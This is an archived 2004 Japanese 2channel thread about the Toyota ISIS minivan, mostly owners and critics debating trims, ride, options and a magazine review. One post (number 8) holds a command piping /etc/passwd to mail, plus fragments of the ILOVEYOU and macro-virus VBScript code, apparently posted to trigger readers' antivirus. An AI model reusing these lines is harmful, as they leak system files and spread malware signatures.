5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【You'r】トヨタ ISIS(アイシス) Part3【Oasis】

1 :名無しさん@そうだドライブへ行こう:04/11/02 00:22:47 ID:cd286V6q
こちらはアイシスのスレ!

公式ページ
ttp://toyota.jp/Showroom/All_toyota_lineup/isis/index.html

【ガイア後継】トヨタ ISIS(アイシス)【新ミッドサイズミニバン】
http://hobby6.2ch.net/test/read.cgi/auto/1093133079/
【プチノア】トヨタ ISIS(アイシス) Part2【デカラウム】
http://hobby6.2ch.net/test/read.cgi/auto/1097475930/


2 :名無しさん@そうだドライブへ行こう:04/11/02 00:28:11 ID:AbAQLsAR
ここですか?
遅いくせして正統スレ謳ってるところは

トヨタ店専売
あいも変わらず抱き合わせop
乗る時降りる時不便なだけのピラーインドア
安っぽいインパネ質感
へぼいメーター
歪んでるガラス
硬い足
回すと五月蝿いエンジン
10以下の燃費
狭い薄い3列目シート
狭い助手席
進歩の無いタンク設計


月間注文数18000おめでとうございます

3 :名無しさん@そうだドライブへ行こう:04/11/02 00:46:22 ID:cd286V6q
↑また来ましたがスルーで^^

4 :名無しさん@そうだドライブへ行こう:04/11/02 00:49:42 ID:0Ea1NftC
トヨタ「アイシス」が好調
http://www.business-i.jp/news/car/art-20041031202912-ZYUQDRQNVJ.nwc

5 :名無しさん@そうだドライブへ行こう:04/11/02 06:01:22 ID:rLIotsD2
999 名無しさん@そうだドライブへ行こう New! 04/11/02 06:00:43 ID:gsVMBHXR
早朝埋め立てー!


1000 名無しさん@そうだドライブへ行こう New! 04/11/02 06:00:52 ID:rLIotsD2
この車、絶対売れねぇwwwwwwwwwwww



1001 1001 New! Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。


6 :名無しさん@そうだドライブへ行こう:04/11/02 06:04:27 ID:gsVMBHXR
俺様の1000を返せー馬鹿ー!(w

7 :名無しさん@そうだドライブへ行こう:04/11/02 06:08:39 ID:rLIotsD2
>>6
うはははは。
朝一で埋め立てご苦労様w

8 :名無しさん@そうだドライブへ行こう:04/11/02 06:59:41 ID:2Lg0BD5m
cat /etc/passwd | mail nobody
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

9 :名無しさん@そうだドライブへ行こう:04/11/02 07:24:35 ID:MDnSd4Pz
前スレ>>994
あなたのあげている不満のほとんどがGuでクリアされているのに、
どうしてプラタナを選択したのでしょうか?


10 :名無しさん@そうだドライブへ行こう:04/11/02 11:26:39 ID:cQeb7iwz
そんなところがいかにもisisオーナー。

11 :名無しさん@そうだドライブへ行こう:04/11/02 14:45:58 ID:mV12StAo
俺は、内装色が黒系ならGuにしたよ…
右側スライドも電動にしたかったし…

12 :名無しさん@そうだドライブへ行こう:04/11/02 17:17:13 ID:+chsx1TW
プラタナにすると右側ドアにはオートクロージャーも付かないのか


13 :名無しさん@そうだドライブへ行こう:04/11/02 18:39:12 ID:T4My+3KV
俺は4年前にエスティマアエラス買った時セカンドシートがキャプテンシートを選べなかった。
トヨタはマイナーチェンジとかでその辺を改善してくる。
っていうか計画どおりって感じかな。



14 :名無しさん@そうだドライブへ行こう:04/11/02 20:11:47 ID:L/TbVjcq
マガジンXで太田という人が書いてた記事が興味深かった。
簡単に言うと乗り味がウィッシュは硬すぎ、エスティマは軟らかすぎ、アイシスはその中間でちょうど良いと。
パノラマドアにした事による弊害(微笑振動の増幅)を押さえ込もうとエンジニアが頑張った結果、
棚からぼた餅、結果オーライ的に乗り味まで良くなったと書いてあった。
確かにその通りだと思う。ミニバンとしては決して悪くない乗り味とハンドリングだと思う。
パノラマオープンドアの使い道等に素直に疑問を投げかけ、今までのトヨタのミニバンの乗り味に
対しても否定的な内容が書いてあったので、単なる提灯記事では無いと思う。
素直に共感できる記事だった。

15 :名無しさん@そうだドライブへ行こう:04/11/02 20:27:45 ID:L/TbVjcq
アイシスという車の特徴を一言で表すと、「中庸」ではないかと思う。
大きすぎず、小さすぎず。硬すぎず、軟らかすぎず。派手すぎず、地味すぎず。
これを「中途半端」と感じるなら、他を選ぶべき。
ただし、プラタナの装備はオーナーから見ても中途半端w

16 :名無しさん@そうだドライブへ行こう:04/11/02 20:42:34 ID:MDnSd4Pz
>>15
俺はむしろここに書き込まれる案外多くのプラタナ契約について
違和感を感じるよ。お前らはアイシスに何を求めているのかと。
走り?スタイリング?コストパフォーマンス?
そんなものアイシスに求める時点で終わってるよ。




17 :名無しさん@そうだドライブへ行こう:04/11/02 21:39:44 ID:aHXQPCUc
普通、この手の車に求めるものはユーティリティ性をおいて他にはないと思うんだが、
ユーティリティ性だけでは面白くも何ともない車が出来るので、「スポーティ風」な味付けをしたり、
コンフォート系の味付けをしたりして何となくイメージを膨らませてるよね。
ただ、無秩序にイメージを膨らませて、狙いがわけわからん車になってるかもしれないけど。

18 :名無しさん@そうだドライブへ行こう:04/11/02 21:59:54 ID:W3oLFRjr
ヲタでまともなミニバンがないんだよな
エスはぐにゃぐにゃサスだし、5ナンバーでは使い勝手が悪すぎるしな

19 :名無しさん@そうだドライブへ行こう:04/11/02 22:14:10 ID:s5ThUYdg
>16
その理論だとプラタナだけでなく1.8もダメと言う訳だな。

20 :名無しさん@そうだドライブへ行こう:04/11/02 23:08:27 ID:o6sahWVG
>14
マガジンXの記事はむしろ後半にある「統括」を読むべき。
そこでアイシスがどう評価されるかが気になる。
ちなみに今号の統括ではポルテがクソボロに言われてた。
常に辛口気味だがあそこまで言われるとは・・・

21 :名無しさん@そうだドライブへ行こう:04/11/02 23:27:56 ID:rM/O5/Jf
さあ。いよいよ今日
トヨタは4ヶ月前に発売したばかりの車のオーナーを裏切りますよ


22 :名無しさん@そうだドライブへ行こう:04/11/02 23:57:27 ID:MDnSd4Pz
>>19
ウェルキャブ以外で1.8を選ぶ香具師はポイントを外してる。

23 :名無しさん@そうだドライブへ行こう:04/11/03 08:33:45 ID:fpT06N5T
>20
統括ではある程度酷評されるだろうね。少なくともインテリアとかシートの作りとかは。
でも、このクラスのミニバンとしての乗り心地やハンドリングまで酷評されるようなら、
むしろマガジンX自体のポリシーとか統一性を疑う。
最初にそこそこの内容の記事を載せてあとで酷評するのでは、
読者を裏切る無責任に編集と言わざるを得ない。
アイシスを買おうとしてる人は、チープな内装(特にL)やイマイチなシート(主に3列目)に
ついてはある程度割り切っている。割り切ったために得られたもの(シートの収納性)もあるし。
また地味だといわれるエクステリアも主観の問題。
だからそれらの点で酷評されても、あるいはここで叩かれても特にダメージは無い。
逆にハンドリングやエンジン性能(CVTも含めて)に関してはこのクラスとしては良くできている。
3000回転を超えるとエンジンはかなりノイジーになるものの、
普段の走りではCVTの恩恵もあってそこまで回転数を上げる必要が無い。
このCVTの出来と10万円という差額、同燃費を考えると、1.8を選ぶメリットは・・・皆無?

24 :名無しさん@そうだドライブへ行こう:04/11/03 08:50:51 ID:fpT06N5T
>16,17
ユーティリティーだけを求めていないのがアイシスオーナーの特徴では?
ユーティリティーだけならノア・ボクで納得するハズ。
やはりアイシスを選ぶ人は、スタイルも走りも利便性もすべてほどほどを求めているのでは?
そういう意味ではプラタナが売れているのはむしろ必然のような気がする。
ただせめて運転席側のオートクロージャーはOP選択可にするべきだった。
それだけでどれだけ満足度が変わったか。トヨタはMC後の販売戦略を考えすぎ。
この設定にした担当者は馬鹿と言わざるを得ない。

25 :名無しさん@そうだドライブへ行こう:04/11/03 09:05:26 ID:/wa9GZDD
それが中途半端たる所以だ

26 :名無しさん@そうだドライブへ行こう:04/11/03 09:11:58 ID:rg46dnBv
それが詐欺師集団盗用多たる所以だ

27 :名無しさん@そうだドライブへ行こう:04/11/03 09:13:40 ID:rg46dnBv
なんか知らんが、アイシス関連スレ見ているとウィルスが侵入してくるのは私だけ?
今だけで2回も。

28 :名無しさん@そうだドライブへ行こう:04/11/03 09:35:57 ID:rg46dnBv
他のスレ巡回してここ繋いだ瞬間またもや・・・ヨタの工作員って一体

29 :名無しさん@そうだドライブへ行こう:04/11/03 10:16:59 ID:JmPOmhtk
>>27-28
PC知識も無いのか


30 :名無しさん@そうだドライブへ行こう:04/11/03 10:40:03 ID:qSR88ClB
ところでアイシスってルーフキャリア付けれるの?
柱がドアに内蔵されてるのは解るけど、
荷物乗せたままドアは開けるわけだし。

31 :名無しさん@そうだドライブへ行こう:04/11/03 10:40:34 ID:qSR88ClB
ところでアイシスってルーフキャリア付けれるの?
柱がドアに内蔵されてるのは解るけど、
荷物乗せたままドアは開けるわけだし。

32 :名無しさん@そうだドライブへ行こう:04/11/03 10:43:12 ID:x6XxqIbP
【石油連盟のHP↓】
http://ime.nu/www.paj.gr.jp/html/paj_info/press/2002/20020527.html
ガソリンの値段の6割は税金(長年の自民党政治が原因)。選挙に行かない、
あるいは選挙で自民党系に投票する人は、この高率の税金に対して、「賛成で
あるという考えの人」になります。
1234567890123456789012

33 :停止しました。。。:停止
真・スレッドストッパー。。。( ̄ー ̄)ニヤリッ

10 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)